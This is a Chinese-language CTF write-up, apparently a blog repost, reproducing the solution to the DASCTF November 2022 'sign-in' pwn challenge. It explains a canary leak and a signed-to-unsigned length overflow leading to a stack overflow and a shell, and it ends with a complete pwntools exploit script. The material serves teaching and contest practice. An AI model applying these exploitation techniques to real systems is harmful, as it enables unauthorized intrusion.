DASCTF NOV X联合出题人2022年度积分榜争夺赛PWN复现

原文地址:

DASCTF NOV X联合出题人2022年度积分榜争夺赛PWN复现

签个到

image

居然是没开NX的,而且还有一个可写可执行的段

image

静态分析:

image

进入get()我们可以看到循环中如果满足heap[i] + 4LL与我们送入内容的前8字符相同,且送入内容+8地址内容(即canary)与heap[i]与的前8字符相同即可进入后门

image

imageadd(16,b’aaaaaaaa’)
get(b’aaaaaaaa’)

随便调试看看

image

image

image

read_len():

image

read_con():

imagesla(‘power length: ‘,0)
#以0来利用整形溢出漏洞,下面进行栈溢出

int类型在linux下默认强制转换为unsign int类型进行比较,所以a与b比较的时候,a会自动转换成unsigned int类型进行比较。由于signed int的符号位最高位是1,转换成unsigned int之后,就会变成一个很大的unsigned int型正数

可以进行很多次的read(0,&buf,1uLL)

sla(‘> ‘,add_idx)
sla(‘power length: ‘,0)
ru(‘name: ‘)

image

pl=b”a”*0x14+p64(0x0000000000020d51)+p32(canary&0xffffffff)
#var_10 heap_size 保持原来的堆块
#var_8 canary后半段

imagesla(‘> ‘,add_idx)
sla(‘power length: ‘,8)
ru(‘name: ‘)

image
可以看到第二次add时2c0处是canary后半段而不是00000886

pl = p32((canary>>32)&0xffffffff)+b”aaaa”
li(‘(canary>>32)&0xffffffff) = ‘+hex((canary>>32)&0xffffffff))
s(pl)

image

choice(get_idx)
ru(‘data: ‘)
pl = p32((canary>>32)&0xffffffff)+b”aaaa”
sl(pl)

比较后getshell

image

image

image

image

最终的exp:

#encoding = utf-8
from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *
from ctypes import *
import os
import sys
import time
#from ae64 import AE64
#from LibcSearcher import *

context.os = 'linux'
context.arch = 'amd64'
#context.arch = 'i386'
context.log_level = "debug"

name = './pwn'

debug = 0
if debug:
p = remote('172.52.16.218',9999)
else:
p = process(name)

libcso = '/lib/x86_64-linux-gnu/libc.so.6'
#libcso = './libc-2.31.so'
libc = ELF(libcso)
#libc = elf.libc
elf = ELF(name)

s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(str(delim),str(data))
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['gnome-terminal','-x','sh','-c']

add_idx = 1
delete_idx = 2
show_idx = 4
edit_idx = 3

def dbg():
gdb.attach(proc.pidof(p)[0])
pause()

bss = elf.bss()

ru('who are u?\n')
s(b'a'*9)

ru('aaaaaaaa')
canary = uu64(p.recv(8))-0x61
li(hex(canary))

def choice(cho):
sla('> ',cho)

def add(size,con):
choice(add_idx)
sla('power length: ',size)
ru('name: ')
sl(con)

def get(data):
choice(delete_idx)
ru('data: ')
s(data)

sla('> ',add_idx)
sla('power length: ',0)
ru('name: ')
pl=b"a"*0x14+p64(0x0000000000020d51)+p32(canary&0xffffffff)
li('canary&0xffffffff = '+hex(canary&0xffffffff))
sl(pl)

sla('> ',add_idx)
sla('power length: ',8)
ru('name: ')
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
li('(canary>>32)&0xffffffff) = '+hex((canary>>32)&0xffffffff))
s(pl)

choice(delete_idx)
ru('data: ')
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
sl(pl)

itr()

'''
def pwn():

if __name__ == '__main__':
pwn()
'''

 

© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发

请登录后发表评论